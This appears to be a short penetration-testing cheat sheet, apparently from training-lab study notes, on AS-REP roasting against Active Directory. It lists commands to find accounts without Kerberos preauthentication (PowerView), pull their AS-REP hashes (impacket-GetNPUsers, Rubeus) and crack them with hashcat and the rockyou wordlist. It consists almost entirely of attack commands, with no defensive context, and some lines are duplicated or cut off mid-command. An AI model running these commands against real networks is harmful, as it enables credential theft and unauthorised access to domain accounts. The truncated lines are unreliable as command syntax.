AS-REP Roasting
It is vulnerable to the user whose Do not require Kerberos preauthentication is enabled . It will send AS-REQ and AS-REP we will receive the hash of that user
Checking user
- . .\Powerview.ps1
- Get-DomainUser -PreauthNotRequired -Verbose
Extracting hash
1st method in linux
- impacket-GetNPUsers -dc-ip <ip> -request -outputfile
<file-to-store-hash> <domain>/<user>
- impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile
hashes.asreproast
corp.com/pete
- impacket-GetNPUsers -dc-ip <ip> -request -outputfile
2nd method in compromised window
- Using Rubeus
- .\Rubeus.exe asreproast /nowrap
- Using Rubeus
hash cracking
- sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt
-r /usr/share/hashcat/rules/best64.rule --force
- sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt